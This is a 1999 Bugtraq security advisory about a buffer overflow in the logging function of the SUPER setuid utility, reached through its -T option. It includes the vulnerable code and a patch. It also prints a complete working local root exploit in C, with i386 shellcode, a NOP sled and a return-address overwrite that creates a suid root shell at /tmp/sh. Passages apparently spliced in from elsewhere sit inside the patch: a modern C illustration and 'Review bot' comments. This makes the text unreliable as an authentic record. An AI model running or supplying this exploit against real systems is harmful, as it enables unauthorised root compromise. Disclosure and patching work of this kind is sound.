Date:	Thu, 25 Feb 1999 01:43:37 -0300
From:	c0nd0r <root@SEKURE.ORG>
Subject:      SUPER buffer overflow
To:	BUGTRAQ@NETSPACE.ORG

                           s e k u r e   S D I
                          http://www.sekure.org
                         -------------------------
                     Brazilian Information Security Team


                  -> SUPER's log function buffer overflow <-



1. Description

  We saw a discussion a few weeks ago on the bugtraq mailing list about a
vulnerability found in the SUPER package which could lead to root
compromise. The author released a patch and the problem was fixed in
the newest version.

  While looking through super 3.11.6, we noticed another possible
buffer overflow condition if the syslog option is enabled (error.c):

  (Error() function)
  (..)
     if (error_syslog) {
        char newfmt[MAXPRINT], buf[MAXPRINT];
  (..)
        va_start(ap, fmt);
        (void) vsprintf(buf, newfmt, ap);
        va_end(ap);
  (..)

 MAXPRINT is 1300, so both buffers are 1300 bytes long.

 The Error() function is used to report error messages, which means it
 probably takes user-supplied data as an argument (it does):

 (time.c)
 (...)
  return Error(0, 0, "%t\n\tInvalid time <%s>\n", str);
 (...)

 str is the string supplied by the -T option.

 As we can see, this bug is a bit different from the one reported last week.
 I've noticed that the 3.11.9 patchlevel is vulnerable to this problem, which
 might mean the newest version of super is vulnerable.


2. Consequences

  Local user may gain root privileges.


3. Recommendations

 Please apply the patch below, or remove the suid bit from the super
 binary (chmod u-s /usr/local/bin/super).
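To show what the vsnprintf() change in the patch below buys, and what it does not, here is an added example of the same Error()-style logging path written with bounded calls; it is not super's code, and bounded_cat(), format_log_line() and log_invalid_time() are names made up for this illustration. It keeps the MAXPRINT size from the advisory and reports truncation, which the patched code discards with its (void) cast.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MAXPRINT 1300   /* same buffer size as super's error.c */

/* Bounded append in the spirit of super's StrLCat(): never writes past
 * dstsz bytes and always leaves dst NUL-terminated. */
static void bounded_cat(char *dst, const char *src, size_t dstsz)
{
    size_t used = strlen(dst);
    if (used + 1 >= dstsz)
        return;                       /* no room left: drop src entirely */
    strncat(dst, src, dstsz - 1 - used);
}

/* Bounded replacement for the vsprintf() call in Error(). Returns 1 if the
 * message had to be cut to fit, 0 otherwise; buf is always a NUL-terminated
 * string of at most bufsz-1 characters either way. */
static int format_log_line(char *buf, size_t bufsz, const char *fmt, ...)
{
    va_list ap;
    int need;

    va_start(ap, fmt);
    need = vsnprintf(buf, bufsz, fmt, ap);   /* C99: length the text needed */
    va_end(ap);
    if (need < 0) {                          /* encoding error: empty line */
        buf[0] = '\0';
        return 1;
    }
    return (size_t)need >= bufsz;            /* >= bufsz means truncated */
}

/* Mirrors the time.c call site: a fixed format plus the user-supplied -T
 * string. Returns the truncation flag so the caller can note it in the log. */
int log_invalid_time(char *buf, size_t bufsz, const char *str)
{
    char newfmt[MAXPRINT];

    newfmt[0] = '\0';
    bounded_cat(newfmt, "Invalid time <%s>\n", sizeof(newfmt));
    return format_log_line(buf, bufsz, newfmt, str);
}
```

With a 2000-byte -T string the line is cut at 1299 characters and the function returns 1; the original vsprintf() path would have written the full 2015 bytes into the 1300-byte buffer.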

--- error.c	Thu Feb 25 00:38:25 1999
+++ error.patch.c	Thu Feb 25 01:07:53 1999
@@ -321,7 +321,7 @@
 	if (tag)
 	    StrLCat(newfmt, tag, sizeof(newfmt));
 	va_start(ap, fmt);
-	(void) vsprintf(buf, newfmt, ap);
+	(void) vsnprintf(buf, sizeof(buf), newfmt, ap);
 	va_end(ap);
 	SysLog(error_priority, buf);
     }
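Review bot: the switch to vsnprintf() stops the overrun, but truncation is now silent: vsnprintf() returns the length the whole message would have needed, and the `(void)` cast throws that away, so an oversized -T string yields a cut-off syslog line with no marker. Consider keeping the return value and, when it is >= sizeof(buf), appending a short "[truncated]" tag before the SysLog(error_priority, buf) call. Note also that in 1999 several libcs either lack vsnprintf() or return -1 / do not NUL-terminate on overflow, so the build should check for a C99-conforming vsnprintf() (or supply one) rather than assume it; the newfmt side is already bounded by StrLCat(newfmt, tag, sizeof(newfmt)).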
@@ -485,7 +485,7 @@
 	StrLCat(newfmt, fmt, sizeof(newfmt));
 	if (tag)
 	    StrLCat(newfmt, tag, sizeof(newfmt));
-	(void) vsprintf(buf, newfmt, ap);
+	(void) vsnprintf(buf, sizeof(buf), newfmt, ap);
 	va_end(ap);
 	SysLog(error_priority, buf);
     }
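Review bot: this repeats the one-line fix from the hunk at line 321 in what looks like a second copy of the same build-newfmt-then-format path (StrLCat into newfmt, vsprintf into buf, SysLog); factoring that into one helper would stop the two from drifting apart again. Two things sit outside the visible context and should be confirmed: the va_start() matching this va_end(ap) is in this function and ap is not used after it, and buf here is a char array (as in the first function, `char newfmt[MAXPRINT], buf[MAXPRINT];`) rather than a pointer, since sizeof(buf) on a pointer would quietly bound the write to 4 or 8 bytes.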


4. Exploit

  You will find the exploit for this issue on our page as well:
  http://ssc.sekure.org

--------------- SDI-super.c --------------------------------------
/*
 * [            Sekure SDI              ]
 * [    Brazilian Info Security Team    ]
 * | ---------------------------------- ]
 * |     SUPER exploit for linux        |
 * | ---------------------------------- |
 * |                                    |
 * |      http://ssc.sekure.org         |
 * |   Sekure SDI Secure Coding Team    |
 * |                                    |
 * | ---------------------------------- |
 * |   by c0nd0r <condor@sekure.org>    |
 * | ---------------------------------- |
 * [ thanks for the ppl at sekure.org:  ]
 * [ jamez(shellcode), bishop, dumped,  ]
 * [ bahamas, fcon, vader, yuckfoo.     ]
 *
 *
 * This will exploit a buffer overflow condition in the log section of
 * the SUPER program.
 *
 * It will create a suid bash owned by root at /tmp/sh.
 * (It'll defeat the debian bash-2.xx protection against rootshell)
 *
 * Note: The SUPER program must be compiled with the SYSLOG option.
 *
 * also thanks people from #uground (irc.brasnet.org network)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* i386 Linux shellcode: execs the command string appended after it */
char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff"
        "/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh";


/* Current stack pointer; the value is left in %eax as the return value (i386 only). */
unsigned long getsp ( void) {
  __asm__("mov %esp,%eax");
}

int main ( int argc, char *argv[] ) {
 char itamar[2040]; /* "ta mar mesmo": a pun on the buffer's name */
 long addr;
 int x, y = 0, offset = 1000, align=0;   /* y indexes the shellcode */

 if ( argc > 1) offset = atoi(argv[1]);

 addr = getsp() + offset;

 /* NOP sled, then the shellcode, then the guessed return address */
 for ( x = 0; x < (1410-strlen(shellcode)); x++)
   itamar[x] = 0x90;

 for (  ; y < strlen(shellcode); x++, y++)
   itamar[x] = shellcode[y];

 for ( ; x < 1500; x+=4) {
  itamar[x  ] = (addr & 0xff000000) >> 24;
  itamar[x+1] = (addr & 0x000000ff);
  itamar[x+2] = (addr & 0x0000ff00) >> 8;
  itamar[x+3] = (addr & 0x00ff0000) >> 16;
 }

 itamar[x++] = '\0';
 printf ( "\nwargames at 0x%lx, offset %d\n", addr, offset);
 printf ( "Look for a suid shell root owned at /tmp/sh\n");

 /* The oversized string reaches Error() through the -T option (time.c) */
 execl ( "/usr/local/bin/super", "super", "-T",itamar, (char *) 0);

 return 0;
}
---------------------- eof -----------------------------------------


5. Contacts


  Sekure SDI Advisory is a publication of Sekure SDI
  Brazilian Information Security Team
  http://www.sekure.org
  mailto:info@sekure.org

  This advisory has been written by Secure Coding Sekure SDI Group.
  http://ssc.sekure.org
  mailto:securecode@sekure.org

  Subscribe to the "Best of Security Brasil" (bos-br) mailing list
  http://bos.sekure.org (Portuguese as the main language)
  mailto:bos-br-request@sekure.org


---
securecode@sekure.org
written by c0nd0r <condor@sekure.org>